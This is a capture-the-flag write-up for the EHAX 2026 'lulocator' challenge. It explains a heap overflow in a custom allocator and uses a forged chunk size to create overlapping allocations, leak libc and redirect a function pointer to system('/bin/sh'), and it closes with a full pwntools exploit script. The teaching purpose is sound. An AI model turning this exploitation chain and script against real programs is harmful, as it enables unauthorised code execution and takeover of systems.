← Back to EHAX 2026

lulocator

Binary Exploitation 50 pts

Challenge

"Who needs that buggy malloc? Made my own completely safe lulocator."

We are given a stripped ELF 64-bit binary with a custom heap allocator backed by mmap, along with the challenge libc. The binary has No PIE, No RELRO, No Canary, and NX enabled.

Binary Analysis

The program provides a menu with 7 operations:

  1. new - Allocates an object with a custom allocator, stores pointer in a slots array (max 16 slots)
  2. write - Reads data from stdin into an object's data buffer
  3. delete - Frees an object and NULLs its slot
  4. info - Prints the object's address, output stream pointer (stdout), and length
  5. set_runner - Stores a slot's object pointer into a global runner variable
  6. run - Calls runner->func_ptr(runner + 0x28) (function pointer stored at offset 0x10 of the object)
  7. quit - Exits

Object Layout (at address returned by allocator)

OffsetSizeField
+0x008field0 (unused, init to 0)
+0x088field1 (unused, init to 0)
+0x108func_ptr (initialized to a print function at 0x401608)
+0x188output stream (FILE* stdout)
+0x208length (user-requested size)
+0x28Nuser data buffer

Custom Allocator

  • Arena: 0x40000 bytes allocated via mmap(PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON)
  • Bump allocation for new chunks, doubly-linked circular free list for freed chunks
  • Chunk header: 8 bytes before the data area, stores aligned_size | in_use_bit
  • Aligned size = align_up(request_size + 8, 16) with minimum 0x28
  • Free list has integrity checks (corrupted free list detection, double-free detection)

Vulnerability: Heap Buffer Overflow

The write command has a bounds check bug. It allows writing up to obj->length + 0x17 (23 extra) bytes into the data buffer at obj + 0x28, but the actual allocated data area may be smaller than that, depending on alignment.

// Pseudocode of the bounds check
if (user_len >= obj->length + 0x18)  // reject
    puts("too long");

When the allocation size is perfectly aligned (e.g., size % 16 == 0), there is zero padding, and the full 23 bytes overflow into the adjacent chunk. This overflow covers:

  • 8 bytes of the next chunk's size header
  • 15 bytes of the next chunk's object fields (offsets 0x00 through 0x0E)

Exploitation Strategy

The key insight is that by corrupting an adjacent chunk's size header, we can create overlapping allocations when the chunk is freed and reallocated.

Step-by-Step

  1. Allocate three adjacent chunks A (slot 0), B (slot 1), C (slot 2), each with size 0x10
  2. Leak libc via info(0) - the out field at obj+0x18 contains a pointer to stdout (a libc address: _IO_2_1_stdout_). Compute libc_base and system() address.
  3. Set runner to C via set_runner(2) - the global runner variable now holds C's address
  4. Write "/bin/sh\0" to C - this goes to C+0x28, which run() will later pass as the argument to the function pointer
  5. Overflow from A into B's chunk header - write 16 bytes of padding + p64(0x101) to change B's apparent chunk size from 0x40 to 0x100 (with in_use bit set)
  6. Free B - the allocator now believes B is a 0x100-byte free chunk, much larger than its actual 0x40 bytes
  7. Allocate D (size 0x20) - the allocator finds B's "large" free chunk and allocates from it. The allocation takes the first 0x50 bytes, and the allocator splits the remainder (0xB0 bytes) into a new free chunk starting at C+0x08. This remainder overlaps with C's object fields.
  8. Write through D to overflow into C's memory. D's user data starts at offset 0x28 from D. C's function pointer (C+0x10) is exactly 40 bytes from D's user data start. We write: 32 bytes of D's data + 8 bytes padding + 8 bytes of system() address. This overwrites C+0x10 (the func_ptr) with system.
  9. Call run() - this executes runner->func_ptr(runner + 0x28) which is now system("/bin/sh"), giving us a shell.

Memory Layout Diagram

Before corruption:
[A header][A object (0x38 bytes)][B header][B object (0x38 bytes)][C header][C object]
 base+0   base+8                  base+0x40 base+0x48              base+0x80 base+0x88

After step 5 (overflow from A):
[A header][A data... AAAA...][0x101     ][B object               ][C header][C object]
                              ^corrupted B header (was 0x41)

After step 7 (alloc D from "big" B):
[A chunk  ][D header][D object (0x48 bytes)   ][remainder hdr][remainder...]
                                                ^base+0x90 = C+0x08
                                                          ^C+0x10 = func_ptr (in remainder)

After step 8 (write through D):
D's write data:  [DDDDD...32 bytes...][00000000][system_addr]
Lands at:        D+0x28               C+0x08    C+0x10 (func_ptr!)

Exploit Code

from pwn import *

p = remote('chall.ehax.in', 40137)
libc = ELF('./libc.so.6', checksec=False)

# Helper functions for menu interaction
def new(sz):
    p.sendlineafter(b'> ', b'1'); p.sendlineafter(b'size: ', str(sz).encode()); return p.recvline()
def write_data(idx, data):
    p.sendlineafter(b'> ', b'2'); p.sendlineafter(b'idx: ', str(idx).encode())
    p.sendlineafter(b'len: ', str(len(data)).encode()); p.sendafter(b'data: ', data); return p.recvline()
def delete(idx):
    p.sendlineafter(b'> ', b'3'); p.sendlineafter(b'idx: ', str(idx).encode()); return p.recvline()
def info(idx):
    p.sendlineafter(b'> ', b'4'); p.sendlineafter(b'idx: ', str(idx).encode()); return p.recvline()
def set_runner(idx):
    p.sendlineafter(b'> ', b'5'); p.sendlineafter(b'idx: ', str(idx).encode()); return p.recvline()

new(0x10); new(0x10); new(0x10)                             # A=slot0, B=slot1, C=slot2
stdout_addr = int(info(0).split(b'out=')[1].split(b' ')[0], 16)
libc_base = stdout_addr - libc.symbols['_IO_2_1_stdout_']
system_addr = libc_base + libc.symbols['system']

set_runner(2)                                                # runner -> C
write_data(2, b'/bin/sh\x00')                                # C+0x28 = "/bin/sh"
write_data(0, b'A'*0x10 + p64(0x101))                       # corrupt B header: size=0x100
delete(1)                                                     # free "big" B
new(0x20)                                                     # D=slot1, overlaps C
write_data(1, b'D'*0x20 + p64(0) + p64(system_addr))        # overwrite C+0x10 = system
p.sendlineafter(b'> ', b'6')                                 # run() -> system("/bin/sh")
p.interactive()